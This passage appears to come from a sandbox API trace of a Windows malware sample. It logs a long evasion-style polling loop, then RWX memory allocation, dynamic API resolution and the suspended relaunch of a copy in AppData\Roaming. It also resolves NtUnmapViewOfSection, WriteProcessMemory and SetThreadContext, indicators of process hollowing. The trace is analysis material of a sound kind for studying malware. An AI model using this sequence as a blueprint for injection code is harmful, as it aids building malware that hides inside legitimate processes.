GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.618] GetSystemDefaultLangID () returned 0x2670409 [0149.618] GetThreadLocale () returned 0x409 [0149.618] GetCurrentProcess () returned 0xffffffff [0149.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.618] GetSystemDefaultLangID () returned 0x2670409 [0149.618] GetThreadLocale () returned 0x409 [0149.618] GetCurrentProcess () returned 0xffffffff [0149.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.618] GetSystemDefaultLangID () returned 0x2670409 [0149.618] GetThreadLocale () returned 0x409 [0149.618] GetCurrentProcess () returned 0xffffffff [0149.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.618] GetSystemDefaultLangID () returned 0x2670409 [0149.618] GetThreadLocale () returned 0x409 [0149.619] GetCurrentProcess () returned 0xffffffff [0149.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.619] GetSystemDefaultLangID () returned 0x2670409 [0149.619] GetThreadLocale () returned 0x409 [0149.619] GetCurrentProcess () returned 0xffffffff [0149.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.619] GetSystemDefaultLangID () returned 0x2670409 [0149.619] GetThreadLocale () returned 0x409 [0149.619] GetCurrentProcess () returned 0xffffffff [0149.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.619] GetSystemDefaultLangID () returned 0x2670409 [0149.619] GetThreadLocale () returned 0x409 [0149.619] GetCurrentProcess () returned 0xffffffff [0149.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.619] GetSystemDefaultLangID () returned 0x2670409 [0149.619] GetThreadLocale () returned 0x409 [0149.619] GetCurrentProcess () returned 0xffffffff [0149.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.619] GetSystemDefaultLangID () returned 0x2670409 [0149.619] GetThreadLocale () returned 0x409 [0149.619] GetCurrentProcess () returned 0xffffffff [0149.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.619] GetSystemDefaultLangID () returned 0x2670409 [0149.619] GetThreadLocale () returned 0x409 [0149.619] GetCurrentProcess () returned 0xffffffff [0149.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.650] GetSystemDefaultLangID () returned 0x2670409 [0149.650] GetThreadLocale () returned 0x409 [0149.650] GetCurrentProcess () returned 0xffffffff [0149.650] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.650] GetSystemDefaultLangID () returned 0x2670409 [0149.650] GetThreadLocale () returned 0x409 [0149.650] GetCurrentProcess () returned 0xffffffff [0149.650] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.650] GetSystemDefaultLangID () returned 0x2670409 [0149.650] GetThreadLocale () returned 0x409 [0149.650] GetCurrentProcess () returned 0xffffffff [0149.650] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.650] GetSystemDefaultLangID () returned 0x2670409 [0149.650] GetThreadLocale () returned 0x409 [0149.650] GetCurrentProcess () returned 0xffffffff [0149.650] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.650] GetSystemDefaultLangID () returned 0x2670409 [0149.650] GetThreadLocale () returned 0x409 [0149.650] GetCurrentProcess () returned 0xffffffff [0149.650] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.650] GetSystemDefaultLangID () returned 0x2670409 [0149.650] GetThreadLocale () returned 0x409 [0149.651] GetCurrentProcess () returned 0xffffffff [0149.651] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.651] GetSystemDefaultLangID () returned 0x2670409 [0149.651] GetThreadLocale () returned 0x409 [0149.651] GetCurrentProcess () returned 0xffffffff [0149.651] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.729] GetSystemDefaultLangID () returned 0x2670409 [0149.729] GetThreadLocale () returned 0x409 [0149.729] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.730] GetThreadLocale () returned 0x409 [0149.730] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.730] GetThreadLocale () returned 0x409 [0149.730] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.730] GetThreadLocale () returned 0x409 [0149.730] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.730] GetThreadLocale () returned 0x409 [0149.730] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.730] GetThreadLocale () returned 0x409 [0149.730] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.730] GetThreadLocale () returned 0x409 [0149.730] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.730] GetThreadLocale () returned 0x409 [0149.730] GetCurrentProcess () returned 0xffffffff [0149.730] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.730] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.731] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.731] GetSystemDefaultLangID () returned 0x2670409 [0149.731] GetThreadLocale () returned 0x409 [0149.731] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.732] GetThreadLocale () returned 0x409 [0149.732] GetCurrentProcess () returned 0xffffffff [0149.732] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.732] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.733] GetSystemDefaultLangID () returned 0x2670409 [0149.733] GetThreadLocale () returned 0x409 [0149.733] GetCurrentProcess () returned 0xffffffff [0149.733] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.734] GetCurrentProcess () returned 0xffffffff [0149.734] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.734] GetSystemDefaultLangID () returned 0x2670409 [0149.734] GetThreadLocale () returned 0x409 [0149.735] GetCurrentProcess () returned 0xffffffff [0149.735] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.735] GetSystemDefaultLangID () returned 0x2670409 [0149.735] GetThreadLocale () returned 0x409 [0149.735] GetCurrentProcess () returned 0xffffffff [0149.735] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.735] GetSystemDefaultLangID () returned 0x2670409 [0149.735] GetThreadLocale () returned 0x409 [0149.735] GetCurrentProcess () returned 0xffffffff [0149.735] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.735] GetSystemDefaultLangID () returned 0x2670409 [0149.735] GetThreadLocale () returned 0x409 [0149.735] GetCurrentProcess () returned 0xffffffff [0149.735] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.735] GetSystemDefaultLangID () returned 0x2670409 [0149.735] GetThreadLocale () returned 0x409 [0149.735] GetCurrentProcess () returned 0xffffffff [0149.735] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.736] GetThreadLocale () returned 0x409 [0149.736] GetCurrentProcess () returned 0xffffffff [0149.736] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.736] GetSystemDefaultLangID () returned 0x2670409 [0149.737] GetThreadLocale () returned 0x409 [0149.737] GetCurrentProcess () returned 0xffffffff [0149.737] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.737] GetSystemDefaultLangID () returned 0x2670409 [0149.737] GetThreadLocale () returned 0x409 [0149.737] GetCurrentProcess () returned 0xffffffff [0149.737] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.737] GetSystemDefaultLangID () returned 0x2670409 [0149.737] GetThreadLocale () returned 0x409 [0149.737] GetCurrentProcess () returned 0xffffffff [0149.737] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.737] GetSystemDefaultLangID () returned 0x2670409 [0149.737] GetThreadLocale () returned 0x409 [0149.737] GetCurrentProcess () returned 0xffffffff [0149.737] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.737] GetSystemDefaultLangID () returned 0x2670409 [0149.737] GetThreadLocale () returned 0x409 [0149.737] GetCurrentProcess () returned 0xffffffff [0149.737] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.737] GetSystemDefaultLangID () returned 0x2670409 [0149.737] GetThreadLocale () returned 0x409 [0153.397] LocalAlloc (uFlags=0x0, uBytes=0xf748) returned 0x2681380 [0153.398] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76720000 [0153.398] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0153.398] VirtualProtect (in: lpAddress=0x2681380, dwSize=0xf748, flNewProtect=0x40, lpflOldProtect=0x19e80c | out: lpflOldProtect=0x19e80c*=0x4) returned 1 [0153.415] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0153.415] GetProcAddress (hModule=0x76720000, lpProcName="GlobalAlloc") returned 0x76739950 [0153.415] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0153.416] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0153.416] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0153.416] GetProcAddress (hModule=0x76720000, lpProcName="CreateToolhelp32Snapshot") returned 0x76747b50 [0153.416] GetProcAddress (hModule=0x76720000, lpProcName="Module32First") returned 0x767644b0 [0153.416] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0153.416] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xac [0153.572] Module32First (hSnapshot=0xac, lpme=0x19f1cc) returned 1 [0153.574] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x2580000 [0153.576] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0153.576] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0153.576] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageExtraInfo") returned 0x74403690 [0153.576] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="WinExec") returned 0x7675ff70 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490 [0153.577] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800 [0153.578] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0153.578] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0153.578] GetProcAddress (hModule=0x76720000, lpProcName="GetCommandLineA") returned 0x7673ab60 [0153.578] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771d0000 [0153.578] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0153.578] GetProcAddress (hModule=0x771d0000, lpProcName="NtWriteVirtualMemory") returned 0x77247040 [0153.578] GetProcAddress (hModule=0x743d0000, lpProcName="RegisterClassExA") returned 0x74404e90 [0153.578] GetProcAddress (hModule=0x743d0000, lpProcName="CreateWindowExA") returned 0x74406f30 [0153.578] GetProcAddress (hModule=0x743d0000, lpProcName="PostMessageA") returned 0x743ff0e0 [0153.578] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageA") returned 0x743fe130 [0153.579] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcA") returned 0x7725aed0 [0153.579] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesA") returned 0x76746a20 [0153.579] GetProcAddress (hModule=0x76720000, lpProcName="GetStartupInfoA") returned 0x76739c10 [0153.579] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtectEx") returned 0x76762790 [0153.579] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0153.579] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0153.579] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0153.579] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0153.580] RegisterClassExA (param_1=0x19ee88) returned 0xc1e1 [0153.580] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x70306 [0153.860] PostMessageA (hWnd=0x70306, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0153.860] GetMessageA (in: lpMsg=0x19eeb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eeb8) returned 1 [0153.860] GetMessageA (in: lpMsg=0x19eeb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eeb8) returned 1 [0153.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x25a0000 [0153.860] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x25a0000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0153.861] GetStartupInfoA (in: lpStartupInfo=0x19eddc | out: lpStartupInfo=0x19eddc*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0153.861] GetCommandLineA () returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0153.861] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19eddc*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x19ee34 | out: lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", lpProcessInformation=0x19ee34*(hProcess=0x110, hThread=0x10c, dwProcessId=0xccc, dwThreadId=0xcc4)) returned 1 [0153.883] VirtualFree (lpAddress=0x25a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.884] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x25a0000 [0153.885] GetThreadContext (in: hThread=0x10c, lpContext=0x25a0000 | out: lpContext=0x25a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, 